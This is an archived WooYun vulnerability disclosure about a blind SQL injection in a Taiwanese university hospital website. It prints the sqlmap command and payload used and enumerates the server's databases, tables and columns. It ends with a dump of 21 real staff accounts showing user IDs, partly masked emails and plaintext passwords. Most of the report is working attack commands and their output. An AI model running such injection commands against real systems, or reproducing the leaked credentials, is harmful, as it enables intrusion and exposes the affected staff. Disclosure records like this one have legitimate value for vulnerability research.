乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-14: 细节已通知厂商并且等待厂商处理中 2015-10-16: 厂商已经确认,细节仅向厂商公开 2015-10-26: 细节向核心白帽子及相关领域专家公开 2015-11-05: 细节向普通白帽子公开 2015-11-15: 细节向实习白帽子公开 2015-11-30: 细节向公众公开
台湾国立成功大学医院某处存在SQL注射漏洞(布尔盲注/用户邮箱及明文密码泄露)
使用sqlmap进行测试,测试地址:http://**.**.**.**/nckm/english/HomeStyle.aspx?Type=11&ContentPage=0
python sqlmap.py -u "http://**.**.**.**/nckm/english/HomeStyle.aspx?Type=11&ContentPage=0" -p Type --technique=B --random-agent -D nckmWeb -T www.UserAccount -C Userid,UserEmail,Userpwd,IsAdmin --dump --threads=10
---Parameter: Type (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Type=11 AND 4724=4724&ContentPage=0---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008
back-end DBMS: Microsoft SQL Server 2008database management system users [2]:[*] lsn[*] sa
back-end DBMS: Microsoft SQL Server 2008available databases [14]:[*] Exam100[*] Exam81[*] Exam91[*] HSYS[*] LISDB_inquiry[*] master[*] model[*] msdb[*] mv4[*] nckmWeb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] WorkTemp
Database: nckmWeb[21 tables]+-----------------------+| www.Dept || www.FileDownLoads || www.FileDownLoads_old || www.FileType || www.GroupAccess || www.News || www.NewsPgAccess || www.News_bk || www.News_old || www.News_tmp || www.PageProfile || www.SiteCounter || www.Speech || www.SystemProfile || www.Ugroup || www.UserAccess || www.UserAccount || www.UserGroup || www.WebLinks || www.WebLinks_old || www.WebLinks_tmp |+-----------------------+
Database: nckmWebTable: www.UserAccount[14 columns]+-------------+| Column |+-------------+| DeptID || IsAdmin || IsEabled || KeyID || SysDate || SysUserid || UserEmail || Userid || UsernNaC || UsernNaE || UsernNikeNa || UserNote || Userpwd || Userpwdhint |+-------------+
Database: nckmWebTable: www.UserAccount[21 entries]+--------+---------------------------+---------+| Userid | UserEmail | Userpwd |+--------+---------------------------+---------+| 0000 | em75380@**.**.**.** | 5874 || 11C0 | <blank> | 11C0 || 1200 | em75576 | 1200 || 1400 | <blank> | 1400 || 1500 | <blank> | 1500 || 1600 | <blank> | 1600 || 1700 | <blank> | 1700 || 2000 | <blank> | sur5203 || 3100 | <blank> | 3100 || 3200 | em75441@**.**.**.** | 0925 || 3300 | <blank> | 5311 || 3400 | em75237@**.**.**.** | 3400 || 3500 | em75417@**.**.**.** | lee1016 || 3600 | em75190@**.**.**.** | 3600 || 3700 | <blank> | 3700 || 4100 | <blank> | 4100 || 4200 | <blank> | 4200 || 4300 | <blank> | 4300 || 4400 | <blank> | 2085 || 5000 | <blank> | 5000 || 6000 | <blank> | 821129 |+--------+---------------------------+---------+
增加过滤。
危害等级:高
漏洞Rank:15
确认时间:2015-10-16 00:23
感謝通報
暂无